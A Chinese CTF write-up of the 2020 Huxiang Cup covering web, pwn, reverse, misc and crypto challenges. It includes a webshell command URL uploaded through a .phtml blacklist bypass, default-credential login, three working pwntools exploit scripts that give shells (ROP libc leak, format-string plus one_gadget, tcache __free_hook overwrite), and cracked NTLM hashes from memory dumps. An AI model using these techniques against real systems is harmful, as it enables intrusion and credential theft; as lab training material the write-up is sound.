2020湖湘杯部分WriteUp

the_one  1511天前

Web

1、题目名字不重要反正题挺简单的

http://ip.55:53001/?file=phpinfo

给 phpinfo 还把 flag 放在变量里可还行

DASCTF{9ef7f60bdddfb4671bb6e6cc77dcc0c5}

4、NewWebsite

http://ip:54500/Readme.txt

AWD 的题,直接找简单洞就行了

http://ip:54500/?r=content&cid=15

注入可以跑,但是表里找了一圈没 flag

http://ip:54500/admin/?r=index#

admin/admin 这种默认口令直接进后台(AWD 里拿到靶机后应第一时间把默认凭据改掉,否则对手也能用同样方式进来)

http://ip:54500/admin/?r=imageset

图片上传处看起来只按黑名单拦了 .php,php3、phtml 这类同样会被服务器当作 PHP 解析的后缀都能传上去拿到 webshell;修复应改成后缀白名单并重命名上传文件

http://ip:54500//upload/watermark/36921604228866.phtml?911=cat%20/flag

DASCTF{716e7efa46a724eaedacf019682b02ca}

Pwn

1、pwn_printf

第九个参数是 read 的长度参数,填 0x20 的大小即可造成栈溢出

1.png

 2.png

 

第一次:用 puts 泄露出 libc 地址,然后返回到 read 函数做第二次溢出

第二次 getshell

from pwn import *

import time

# pwn_printf: Python 2 pwntools script (generator .next(), str/bytes mixing).
# Two-stage ROP over a stack overflow: stage 1 leaks puts@libc, stage 2 calls system("/bin/sh").
context.log_level ='debug'

sh =remote('ip',56806)

elf =ELF('./pwn_printf')

puts_plt=elf.plt['puts']

puts_got=elf.got['puts']

# libc of the target (Ubuntu 16.04, glibc 2.23); every libc offset below depends on this exact build.
libc = ELF('./libc6_2.23-0ubuntu11.2_amd64.so')

# Address of main; defined but not used by the chains below.
main = 0x4007ef

# pop rdi; ret gadget inside the binary (absolute address, so the binary is non-PIE).
pop_rdi =0x0000000000401213

sh.recvuntil("You will find this game very interesting\n")

# 16 numeric answers are sent; per the writeup the 9th one becomes read()'s length
# (0x20 overflows the buffer). Answering 0x20 everywhere keeps the loop simple.
# The sleep avoids the answers being coalesced into one read.
for i in range(15):

 sh.sendline(str(0x20))

 time.sleep(0.1)

sh.sendline(str(0x20))

# Stage 1 payload: 8 bytes that presumably land in the saved-rbp slot (0x603028 + 0x10068 =
# 0x613090, inside .bss), then puts(puts@got) to leak libc, then return to 0x401172 -- per the
# writeup the read() path, so the stack can be overflowed a second time.
sh.sendline(p64(0x0000000000603028+0x10068)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x401172))

# Leaked pointer: the 6 bytes ending in 0x7f, zero-extended to 8; subtract puts' offset for the base.
libc_addr  =u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.symbols['puts']

log.info('libc'+hex(libc_addr))

 

# Stage 2: junk in the same 8-byte slot, then system("/bin/sh"); the trailing 0x401172 is only
# the return address used if the shell exits.
sh.sendline(8*'a'+p64(pop_rdi)+p64(libc_addr+libc.search("/bin/sh").next())+p64(libc_addr+libc.symbols['system'])+p64(0x401172))

sh.interactive()

flag DASCTF{67f3a3150ca23790e1f83ac28bc739be}

2、blend_pwn

标准 菜单堆题

存在格式化字符串漏洞(开头输入的 name 用 %p%p),可以 leak 出栈地址和 libc 地址

写入 cat flag

通过 666 拿到 flag


3.png4.png

 

from pwn import*

# blend_pwn: Python 2 pwntools script (str and bytes are concatenated below).
context.log_level ='debug'

# Local run (uncomment); the remote placeholder 'ip' must be replaced with the real host.
#p = process('./blend_pwn')

p =remote('ip',53204)

# Loaded but not used further in this script.
elf=ELF('./blend_pwn')

def showneme():
    """Menu 1 ("show name"): echoes the name back, which is how the %p leak is read."""
    option = '1'
    p.sendlineafter('>', option)

def add(note):
    """Menu 2: create a note whose body is `note` (sent after the 'note:' prompt)."""
    for prompt, reply in (('>', '2'), ('note:', note)):
        p.sendlineafter(prompt, reply)

def free(idx):
    """Menu 3: free note number `idx` (sent as decimal text)."""
    for prompt, reply in (('>', '3'), ('>', str(idx))):
        p.sendlineafter(prompt, reply)

def show():
    """Menu 4: list the notes (used after free() to read a heap pointer back)."""
    option = '4'
    p.sendlineafter('>', option)

# The first prompt is the name; "%p%p" turns the later "show name" into a format-string
# leak of two pointers.
p.sendline("%p%p")

showneme()

p.recvuntil("0x")

# First %p: a stack pointer (12 hex digits).
stack_addr = int(p.recv(12),16)

p.recvuntil("0x")

# Second %p: a libc pointer; 0x3c6780 is its distance from the libc base for the
# author's libc -- recompute it for any other build.
libc_base = int(p.recv(12),16)-0x3c6780

# one_gadget offsets for that same libc.
og = [0x45226,0x4527a,0xf0364,0xf1207]

one = libc_base+og[0]

# Note 0: three zero qwords, then the one_gadget address at offset 24.
add(p64(0)*3+p64(one))

add("a"*0x60)

free(0)

free(1)

show()

p.recvuntil("2:")

# After "2:" the listing prints a heap pointer (presumably the freed chunk's fd, which
# the writeup treats as the heap base): read up to the newline, zero-extend to 8 bytes.
heap_base = u64(p.recvuntil("\n")[:-1].ljust(8,"\x00"))

# Hidden menu option 666 (see the writeup), which reads one more line.
p.sendline("666")

p.recv()

# 0x20 bytes of filler, a pointer to heap_base+0x20, then 'A' + 'catflag'. How the binary
# consumes this is not visible here; per the writeup it prints the flag.
p.sendline("A"*0x20+p64(heap_base+0x20)+'A'+'catflag')

p.interactive()

flag:831a8e502383f4f3dd5ce63db9846f68

4、babyheap 

又是一个菜单堆题   增删改查


5.png6.png

Show 功能存在越界读

打 free hook 为 system

输入/bin/sh getshell

from pwn import *


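path = './babyheap'

# `True` is an odd value for pwntools' log_level (normally an int or a level name);
# kept as in the original run.
context.log_level = True

libc = ELF('libc.so.6')

# Local run (uncomment): preload the target libc so the leaked offsets below match.
# p = process(path, env={"LD_PRELOAD": "libc.so.6"})

# The original had a bare name `ip` here (NameError); it is a placeholder for the real host,
# written as a string like the other scripts in this writeup.
p = remote('ip', 51503)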

def add():
    """Menu entry 1: allocate a chunk; no index or size is prompted for."""
    p.sendlineafter(">>", "1")

def edit(id, size, data):
    """Menu entry 3: overwrite chunk `id` with `data`, declaring `size` bytes.

    `size` is whatever the caller claims (the exploit passes values such as 0xf8
    here, apparently beyond the chunk -- not verified from this script).
    """
    p.sendlineafter(">>", "3")
    p.sendlineafter("index?\n", str(id))
    p.sendlineafter("Size:\n", str(size))
    p.recvuntil("Content:\n")
    # raw send(): a trailing newline would corrupt binary payloads
    p.send(str(data))

def show(id):
    """Menu entry 2: print chunk `id`. A negative index is accepted (see show(-7) below)."""
    p.sendlineafter(">>", "2")
    p.sendlineafter("index?\n", str(id))

def delete(id):
    """Menu entry 4: free chunk `id`."""
    p.sendlineafter(">>", "4")
    p.sendlineafter("index?\n", str(id))

# babyheap: Python 2 pwntools script (print statement). Plan per the writeup: use the
# out-of-bounds read in show() to leak, get a libc pointer from a chunk that went past
# the tcache, then redirect an allocation onto __free_hook and set it to system.
show(-7)

# Out-of-bounds read through a negative index; `base` is not used later in the script.
base=u64(p.recv(6).ljust(8,'\x00'))-8

# Allocate 8 chunks and free them all (with tcache, 7 fill the bin and the 8th goes to
# the unsorted bin carrying main_arena pointers), then take them all back.
for i in range(8):

       add()

for i in range(8):

       delete(7-i)

for i in range(8):

       add()

# Write 8 'a's into chunk 7 so show() prints right up to the pointer left in it.
edit(7,0xf0,'aaaaaaaa')

show(7)

p.recvuntil('a'*8)

# The 6 bytes after the 'a's are a libc pointer left in the reused chunk (presumably
# an unsorted-bin bk), zero-extended to 8 bytes.
leak=u64(p.recv(6).ljust(8,'\x00'))

print hex(leak)

# 0x3ebca0: distance from the leaked pointer to the libc base, measured in a local debug
# session (it matches main_arena+96 of glibc 2.27); recompute for any other libc.
libcbase=leak-(0x7ffff7dcfca0-0x00007ffff79e4000)

show(0)

# Heap pointer from chunk 0; 0x460 is its offset from the heap start on the author's run.
heap=u64(p.recv(6).ljust(8,'\x00'))-0x460

for i in range(3):

       add()

# Free 8 chunks again (indices 8, 9, 10, then 3..7) and reallocate them.
delete(8)

delete(9)

delete(10)

delete(3)

delete(4)

delete(5)

delete(6)

delete(7)

for i in range(8):

       add()

# Two copies of a heap address written into chunk 10 with an oversized length
# (0xf8); presumably this rewrites a neighbouring chunk's fd/bk -- not verifiable here.
payload=p64(heap+0x250)*2

edit(10,0xf8,payload)

for i in range(7):

       delete(i+1)

delete(0)

for i in range(7):

       add()

add()

delete(0)

delete(1)

delete(7)

# Point a freed chunk's next pointer (written through edit on chunk 10) at __free_hook,
# so the second add() below hands out __free_hook itself.
free=libcbase+libc.sym['__free_hook']

edit(10,8,p64(free))

add()

add()

system=libcbase+libc.sym['system']

# Chunk 1 now aliases __free_hook: set it to system, then free a chunk holding "/bin/sh".
edit(1,8,p64(system))

edit(2,8,'/bin/sh\x00')

delete(2)

p.interactive()

 
7.png

Re

1、easyZ

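HEX_ALPHABET = "0123456789abcdef"


def parse_hex_lines(lines, rows, cols=slice(2, 6)):
    """Collect the hex tokens in columns `cols` of the first `rows` lines, as ints.

    Each line is split on single spaces (the format of the extracted dumps),
    so the result holds 4 ints per line in file order. Lines past `rows` are
    ignored, as in the original which only consumed the first 8 / 24 lines.
    """
    tokens = []
    for line in list(lines)[:rows]:
        tokens += line.split(" ")[cols]
    return [int(tok, 16) for tok in tokens]


def read_hex_words(path, rows):
    """parse_hex_lines() over the lines of the file at `path`."""
    with open(path, 'r') as f:
        return parse_hex_lines(f, rows)


def recover_chars(coeffs, targets, alphabet=HEX_ALPHABET):
    """Solve a*x^2 + b*x + c == target per position for x in ord(alphabet).

    `coeffs` is [a, b, c] (three equal-length lists) and `targets` the expected
    values. Every character satisfying the equation is kept, so an ambiguous
    position contributes more than one character -- this mirrors the original
    brute force, which appended each match.
    """
    out = []
    for a, b, c, target in zip(*coeffs, targets):
        out.extend(ch for ch in alphabet
                   if a * ord(ch) * ord(ch) + b * ord(ch) + c == target)
    return ''.join(out)


def main():
    # extract1.txt: 8 lines x 4 words = the 32 target values.
    target_arr = read_hex_words('extract1.txt', 8)
    print(target_arr)
    # extract.txt: 3 groups of 8 lines = the a, b, c coefficient rows (32 each).
    words = read_hex_words('extract.txt', 24)
    final_arr = [words[i * 32:(i + 1) * 32] for i in range(3)]
    print(final_arr)
    print(recover_chars(final_arr, target_arr))


if __name__ == '__main__':
    main()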

 flag:8eb5d8b632dae2a5167e3e1c4884eef9

2、easyre

没啥好说的一道题,ida 打开有点乱,动态调试

爆破可得,flag 是输入的,所以逆算法


1.png

 

手动汇编转 C 嘛,难度不大,因为追了一遍发觉算法简单


2.png

 

然后发觉我不会逆这个算法,卡了半个多钟有余,然后就突然想到这就是解方程,z3 上去即可

from z3 import *

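length = 0x18

# One 32-bit symbolic variable per input byte (every constraint masks to 8 bits).
# Named `chars` rather than the original `input`, which shadowed the builtin.
chars = [BitVec('u%d' % i, 32) for i in range(0, length)]

solver = Solver()

# Expected output of the check routine, read from the binary (24 bytes).
List = [0x2B, 0x08, 0xA9, 0xC8, 0x97, 0x2F, 0xFF, 0x8C, 0x92, 0xF0, 0xA3, 0x89,
        0xF7, 0x26, 0x07, 0xA4, 0xDA, 0xEA, 0xB3, 0x91, 0xEF, 0xDC, 0x95, 0xAB]

# Top three bits of the first byte; they wrap around into the last output byte.
temp = chars[0] & 0xE0

# out[i] = ((in[i] << 3) | (in[i+1] >> 5)) & 0xff, XORed with i: a 3-bit shift that
# pulls the high bits of the next byte in, as recovered from the disassembly.
for i in range(0x17):
    solver.add(((((chars[i] << 0x3) | (chars[i + 1] >> 0x5)) & 0xff) ^ i) == List[i])

# Last byte: in[0x17] << 3 ORed with the wrapped-around high bits of in[0]. The
# original script applies no XOR here; kept unchanged.
solver.add((((temp >> 0x5) | (chars[0x17] << 0x3)) & 0xFF) == List[0x17])

# Printable, non-NUL bytes only.
for i in range(length):
    solver.add(chars[i] < 255)
    solver.add(chars[i] > 0)

# model() raises if the system is unsat; say so explicitly instead of a z3 traceback.
if solver.check() != sat:
    raise SystemExit('no solution: the constraints above do not match the binary')
result = solver.model()
print(result)

flag = ''.join(chr(result[c].as_long()) for c in chars)
print(flag)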

flag:ea5yre_1s_50_ea5y_t0_y0u

3、ReMe

经典的exe2py 题目,本来用个 exe2py 项目转的,奈何转不了,自己将解包后 struct 头替换掉原来的 ReMe 的头,用 uncompyle6 即可拿到源码


3.png

 

拿到源码后,懒得看代码逆向了,发觉可以爆破

二话不说开始爆破

# uncompyle6 version 3.7.4

# Python bytecode 3.7 (3394)

# Decompiled from: Python 3.8.5 (default, Aug 2 2020, 15:09:07) 

# [GCC 10.2.0]

# Embedded file name: ReMe.py

import sys, hashlib

# 27 md5 digests, one per flag character, in order. A repeated digest (e.g.
# 8e50684a... at positions 8, 13, 18 and 22) means the same character repeats,
# which is why a per-character brute force against each entry works.
check: list[str] = [

 'e5438e78ec1de10a2693f9cffb930d23',

 '08e8e8855af8ea652df54845d21b9d67',

 'a905095f0d801abd5865d649a646b397',

 'bac8510b0902185146c838cdf8ead8e0',

 'f26f009a6dc171e0ca7a4a770fecd326',

 'cffd0b9d37e7187483dc8dd19f4a8fa8',

 '4cb467175ab6763a9867b9ed694a2780',

 '8e50684ac9ef90dfdc6b2e75f2e23741',

 'cffd0b9d37e7187483dc8dd19f4a8fa8',

 'fd311e9877c3db59027597352999e91f',

 '49733de19d912d4ad559736b1ae418a7',

 '7fb523b42413495cc4e610456d1f1c84',

 '8e50684ac9ef90dfdc6b2e75f2e23741',

 'acb465dc618e6754de2193bf0410aafe',

 'bc52c927138231e29e0b05419e741902',

 '515b7eceeb8f22b53575afec4123e878',

 '451660d67c64da6de6fadc66079e1d8a',

 '8e50684ac9ef90dfdc6b2e75f2e23741',

 'fe86104ce1853cb140b7ec0412d93837',

 'acb465dc618e6754de2193bf0410aafe',

 'c2bab7ea31577b955e2c2cac680fb2f4',

 '8e50684ac9ef90dfdc6b2e75f2e23741',

 'f077b3a47c09b44d7077877a5aff3699',

 '620741f57e7fafe43216d6aa51666f1d',

 '9e3b206e50925792c3234036de6a25ab',

 '49733de19d912d4ad559736b1ae418a7',

 '874992ac91866ce1430687aa9f7121fc']

 

 

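def func(num):
    """Return the Collatz trajectory of `num`, excluding `num` itself and ending at 1.

    func(1) is [] because the loop never runs; 0 would loop forever (never
    reached here: the brute force starts at 30).
    """
    result = []
    while num != 1:
        num = num * 3 + 1 if num % 2 else num // 2
        result.append(num)
    return result


def collatz_string(num):
    """Build the text the checker hashes for candidate byte `num`.

    Walks func(num) forwards and backwards in lockstep, appending
    trajectory[idx] then trajectory[-1 - idx] in decimal.
    """
    steps = func(num)
    last = len(steps) - 1
    parts = []
    for idx, forward in enumerate(steps):
        parts.append(str(forward))
        parts.append(str(steps[last - idx]))
    return ''.join(parts)


def candidate_digest(num):
    """md5 hex digest of collatz_string(num), i.e. what check[i] is compared against."""
    return hashlib.md5(collatz_string(num).encode('utf-8')).hexdigest()


def recover_flag(check, lo=30, hi=128):
    """Brute-force one byte per digest in `check` and return the recovered text.

    For each position the first value in range(lo, hi) whose candidate_digest()
    equals check[i] is taken (mirrors the original `break`). Different bytes can
    share a trajectory (e.g. 20 and 122 both go to 61 next), so the lower bound
    matters. Raises ValueError when no candidate matches, rather than silently
    producing a shorter flag as the original did.
    """
    recovered = []
    for i, digest in enumerate(check):
        for each_num in range(lo, hi):
            if candidate_digest(each_num) == digest:
                recovered.append(chr(each_num))
                break
        else:
            raise ValueError('no byte in [%d, %d) matches digest %d (%s)' % (lo, hi, i, digest))
    return ''.join(recovered)


if __name__ == '__main__':
    # The original compared a dummy 27-element input against 27; the digest list
    # is the real constraint.
    if len(check) != 27:
        print('length error!')
        sys.exit(-1)
    inp = recover_flag(check)
    print(inp)
    md5 = hashlib.md5()
    md5.update(inp.encode('utf-8'))
    print('You win!')
    print('flag{' + md5.hexdigest() + '}')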

# okay decompiling ReMe1.pyc

 4.png

flag:flag{0584cfa2ce502951ef5606f6b99fc921}

4、easy_c++

送分题,直接异或得到结果

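# Ciphertext pulled from the binary. Note the two single spaces around 't'
# (indices 16 and 18): the published copy had collapsed one of them, leaving a
# 31-character string that made range(32) raise IndexError. With 32 characters
# the XOR below reproduces the flag quoted in the writeup.
result = '7d21e<e3<:3;9;ji t r#w"$*{*+*$|,'


def xor_index(cipher):
    """Undo the check routine: character i of `cipher` was XORed with i."""
    return ''.join(chr(ord(ch) ^ i) for i, ch in enumerate(cipher))


flag = xor_index(result)
print(flag)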

flag:7e02a9c4439056df0e2a7b432b0069b3

Misc

1、颜文字之谜

流量包 导出 http 对象

打开 html 文件 查看源代码 发现一段base64 编码

解码出颜文字

base64 隐写

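def get_base64_diff_value(s1, s2):
    """Return the base64-alphabet index distance at the first position where s1 and s2 differ.

    The original signature had lost its comma (`s1s2`). Only the first
    len(s2) characters are compared; 0 means the strings agree there. The
    stego hides bits in the unused low bits of the character before the '='
    padding, so this distance is exactly the hidden value for that line.
    """
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    for c1, c2 in zip(s1, s2):
        if c1 != c2:
            return abs(base64chars.index(c1) - base64chars.index(c2))
    return 0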

 

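def solve_stego(path='1.txt'):
    """Recover the bits hidden in the padding of each base64 line of `path`.

    Ported to Python 3 (the original used the Python 2 'base64' codec and had
    several commas lost in extraction). For each line, re-encoding the decoded
    data gives the canonical line; the index distance to the actual line is
    the hidden value, zero-padded to 2 bits per '=' and appended. The decoded
    text so far is printed after every line.
    """
    import base64
    bin_str = ''
    with open(path, 'rb') as f:
        for raw in f:
            steg_line = raw.rstrip(b'\r\n').decode('ascii')
            norm_line = base64.b64encode(base64.b64decode(steg_line)).decode('ascii')
            diff = get_base64_diff_value(steg_line, norm_line)
            print(diff)
            pads_num = steg_line.count('=')
            if diff:
                bin_str += bin(diff)[2:].zfill(pads_num * 2)
            else:
                bin_str += '0' * pads_num * 2
            print(goflag(bin_str))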

 

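def goflag(bin_str):
    """Turn a string of '0'/'1' into text, 8 bits per character.

    The original `xrange(0len(bin_str), 8)` had lost its comma. A trailing
    group shorter than 8 bits is converted as-is (so partial output can be
    printed while the bit string is still growing); '' yields ''.
    """
    chunks = (bin_str[i:i + 8] for i in range(0, len(bin_str), 8))
    return ''.join(chr(int(chunk, 2)) for chunk in chunks)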

 

if __name__ == '__main__':
    solve_stego()

  

1.png

flag:67b33e39b5105fb4a2953a0ce79c3378

2、passwd

we need sha1(password)!!!附件下载链接: https://pan.baidu.com/s/1vXUF3Fdvz9Wj4vEJwQdAow 提取码:****

imageinfo 拿到模板

volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw--profile=Win7SP1x86 hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

CTF:1000:aad3b435b51404eeaad3b435b51404ee:0a640404b5c386ab12092587fe19cd02:::

Administrator 和 Guest 的 NT hash 都是 31d6cfe0d16ae931b73c59d7e0c089c0,即空密码(aad3b435b51404eeaad3b435b51404ee 是空 LM hash),只有 CTF 用户有真实口令:它的 NT hash 0a640404b5c386ab12092587fe19cd02 查表解出明文 qwer1234

sha1 后提交:c0206653cd8308cd738f0c69c7d84ba2(注意这里只有 32 位十六进制,完整的 SHA-1 摘要应是 40 位,可能是平台再做了一次 md5 或原文被截断,提交前自己重新计算一遍)

3、虚实之间

winhex 修复压缩包,拖出 mingwen - 副本.txt

明显的明文攻击,但是试了很久 ARCHPR 都报错出不了。。。

换成 AZPR_4.0,然后压缩成 zip,跑出密码 123%asd!O

解压得到 ffd5e341le25b2dcab15cbb}gc3bc5b{789b51

根据提示,栅栏 5 格

flag{febc7d2138555b9ebccb32b554dbb11c}

4、隐藏的秘密

重命名成了 a.vmem,imageinfo 拿到模板后

volatility -f a.vmem --profile=Win2003SP2x86hashdump


出来一堆用户名还以为出问题了,后来看了好久 notepad 的进程也没啥东西

队友死马当成活马医,把所有的 ntlm hash 复制出来,放到 cmd5 批量解密

解出来的值 md5 后,放到平台上暴力尝试了 用户名/ 密码 / 用户名和密码

最终发现 FHREhpe$:NIAIWOMA 这个隐藏用户对了,什么鬼脑洞题

8cf1d5b00c27cb8284bce9ccecb09fb7

Crypto

1、LFSXOR

参考: https://blog.csdn.net/qq_37672864/article/details/102519409

from pylfsr import LFSR

import itertools

import re

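def xor(a, b):
    """XOR two byte values (ints 0..255) and return the result as one Latin-1 byte.

    The original had lost the space in `returnstr`. Latin-1 ('l1') maps code
    points 0..255 to the same byte values, so this is a one-byte `bytes`;
    a result above 255 raises UnicodeEncodeError as before.
    """
    return chr(a ^ b).encode('l1')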

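def encode(content, key):
    """XOR `content` with `key` repeated cyclically; returns bytes.

    The original had `inrange` / `returntmp` run together. XOR is its own
    inverse, so the same call decrypts. Both arguments are bytes (indexing
    yields ints); an empty key raises ZeroDivisionError, as before.
    """
    period = len(key)
    return bytes(c ^ key[i % period] for i, c in enumerate(content))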

 

 

enc1 =b'\xbb\xd3\x08\x15\xc6:\x08\xb2\xb2\x9f\xe4p\xc7\xec\x7f\xfd)\xf6f\x9c\xe4\xd12\xaeJ\x81\xb1\x88\xab\xa5V\xa9\x88\x14\xdf`~\xf6\xdbJ\xb4\x06S!0\xbb\xe4\x1a\xe6R\x8e\x84X\x19K\x95\x07C\xe8\xb2\'\xa9\x80\x15\xec\x8f\x8dY\nK\x85\x99\xb7!\x134\xa9\xb6\x15\xcf&\r\x9b\xe1\x99\xe4]3h~\xf0\xa9\xa5\x14\xee}\xd19l\x14h\x07v*a0\x12\x14\xfe\x0f\x05\xdem\x1d\xe4s2J\x7f\xc28\xf6RR\x8e\xba\xb2m\x18M\xf1\xef!4\x17\xa8\xb4\x14\xc2\x8f\xb9Y:K\xaa\x06T!\x1b\xbb\xfd\xf6Gv\x8e\x9a\xeb\xd9K\xbb\x06N\x9a\x82c\xa9\xa0\x14\xed!\x04\xdbm\x13\xe5w3B\x7f\xd0\xa9\xbf\xb7\x9c\xe3\xd00\x83K\x86\xab3\x7f\xc1\xbb\xfd\x11\x15\xdf\x8e\x80Y\x07\xd8\xe5]2m\xe9\xbb\xce`\x91o\x8f\x8cY!\x81\xe4J\x92\x8c\xa7T\x16E\x15\xf1WMY(\xb8[\x8e2y~\xcbM\x10\x15\xc7\x1fWY\x0cK\x87\xce\xe5!b\xa8\x83\x14\xec6\xd1!\xc8\x905\xe52L\xf1\xba\xcf\n\x9d\x9d\xe7u\xadm\x06\xe4n2r\xd8\xba\xed\xf6\x7f\x9d\xd8\xd02m\x12G\x07Y\x89\x7f\xc0\xa8\xa4\x15\xe5\x043Y\x1eJ\xae\x07n\x94\x87\xbb\xcf_\x8d\x9d\xd1\x14Y,\x9e\xe5b\xd7\x8c\x7f\xf7\xa8\x8f\x14\xc7\x8f\xb3\xb6\xf1\x93\xe4O\xdd\xc4\xdb\xba\xf6!\x15\xfd.\xd1\x18\xcf\xf6\x03\xea2E\x7f\xe1\xa9\xa5\xfe\x9d\xc9\xd1;\xd9\xee\x05\x06z\xc8\xb2\xbb\xe2\xf7{JW4\xcdm\x1a\xe5U\x8d\x0f&\x14\x7f\xf6\x9d\xd4E\xbf\xc3\xdb\xe4L\xe1\xf7\x90\xbb\xdaZ\xf4\x9d\xd13\xb8m3\xe2D3o~\xf8H\xf6U*\x07lY\x03K\xab\x07~\xa3\x87\xbb\xc9\xf7sAQ\x08Y6J\x86\x07Y\xec\xf7\xbb\xc6s\x15\xc6\x7fEY\x02J\x95\x07Z\x11\xbb\xc6T\x15\xfc-\xd0\x06\xe6\x9f-\x07^ 
\x15\xbb\xccz\x14\xf3\x8f\x97\xd4l9t\x85\xe8\x8a\xbe\xbb\xf9\xf6f\x9d\xf2\xd19\xa2K\xb6\xcd\xcf\xf6~\xd5\xa9\xaa\x15\xd8\x8e\xb3\x81m9\xe4f\xb2!\x1e\xba\xd8s\xfd\x11\x08W\xa1l;\x01\x07_!\x11\xbb\xdd\xf6x\x9d\xf0\x17Y\x15\xfe\x02\xc7\xa0!.W\xa9\xa5\x8f\x9c\xe8\xd1\x12m\x04\xe5s3Q~\xdd\xa9\xa3\x15\xdb\x8f\xac\xaf\xec\xbb\x10\xde2_\xba\xba\xe8\xf6f.\x1e\xd1\x17l\x06\xe4U\xdd\xf0\xd6~\x0fA\x14\xcb\x8e\xb0Y\x1fJ\xb2\xe4\xb3!"\xba\xfeU\x14\xedY\xd0>l-~\x06P1\xbb\xf2\xf6waD\xd1(m\x12`\x06@\xb6~\xfa\xa9\xb1\xb0\x9d\xfb\x18\xfbm&\xe4v2w\xce\xba\xcbo\xd5\x07\x11QX<J\xbd\xb22O\x7f\xd8x>\xc8\x9c\xd3\xd03\x9d\xb5\x1e\xd72S\xf2ry\xf1W\x9c\xc89Y\rK\x8f\xff\x8a\xe0\xb5{\xa9\xae\xb1\x9d\xdd\xd1=\xbeK\xa3\x06e!\x08\xba\xd2\xf6j\x9c\xf6\xd0\x0fl#\xe5o\xf5\xaa~\xc2\xa9\x99\x15\xea6\xd1:\xe7\xa8\xe4n\xbb\nV\xa9\x91\x14\xf9}\xd0!m/\xe5|2o\x81\xba\xf8\r\x14\xeb\tR\xc9\xec\xdd`\xbf\xc6\x81\xdfKXW\xb3o.%\xa9\xcd\xb9\x14\xfd\x97\x83\x8eO\n\x03\xb6iuu\xab\x9d\xbc\x15\xf4\xc3\xd6\xc1'

flag = b'DASCTF{'

print(len(enc1))

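KEY_LEN = 15        # period of the 4-bit LFSR below (2**4 - 1): one key byte per state
FLAG_OFFSET = 770   # where 'DASCTF{' sits in enc1 (found by the author; the 1-wide range is a leftover scan)

for start in range(FLAG_OFFSET, FLAG_OFFSET + 1):
    print(start)
    # Known plaintext: the 7 key bytes that encrypted the flag prefix. Their slots in
    # the 15-byte key are (i + start) % 15 = 5..11, which is why they are spliced into
    # the middle of the key below.
    key_char = [xor(enc1[i + start], flag[i])[0] for i in range(7)]
    # Try every 4-bit seed of the LFSR x^4 + x^3 + 1 (the all-zero seed only yields
    # NUL bytes and simply never matches).
    for x in itertools.product([1, 0], repeat=4):
        print(x)
        L4 = LFSR(fpoly=[4, 3], initstate=list(x))
        data = L4.runFullCycle()
        # Read the stream 8 bits at a time, one key byte per state of the period.
        k4 = ''
        for _ in range(len(data)):
            bits = ''.join(str(L4.next()) for _ in range(8))
            k4 += chr(int(bits, 2))
        if not all(chr(c) in k4 for c in key_char):
            continue
        print('match')
        # Remaining key bytes: the LFSR output minus the 7 already known. Their order is
        # unknown, so every permutation is tried (at most 8! = 40320 candidates).
        unknown = list(set(ord(k) for k in k4) - set(key_char))
        for y in itertools.permutations(unknown, len(unknown)):
            key = ''.join(chr(_) for _ in y).encode('l1')
            key = key[:5] + ''.join(chr(_) for _ in key_char).encode('l1') + key[5:8]
            content = encode(enc1, key)[start:].decode('l1')
            if re.match(r'DASCTF\{[0-9a-f]{32}\}', content):
                print(content)
                exit()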

flag:7cc33bd1c63b029fa25a6a78f1253024

2、古典美++

https://github.com/atomcated/Vigenere

https://atomcated.github.io/Vigenere/

得到密钥 ordeyby,全大写 md5

c82bbc1ac4ab644c0aa81980ed2eb25b

3、简单的密码 3


2.png

5dd56e94dc11423e8bdb36b5d87a0(注:只有 29 位十六进制,不是完整的 32 位 md5,原文可能有截断,以平台为准)


本文为白帽汇原创文章,如需转载请注明来源:https://nosec.org/home/detail/4599.html
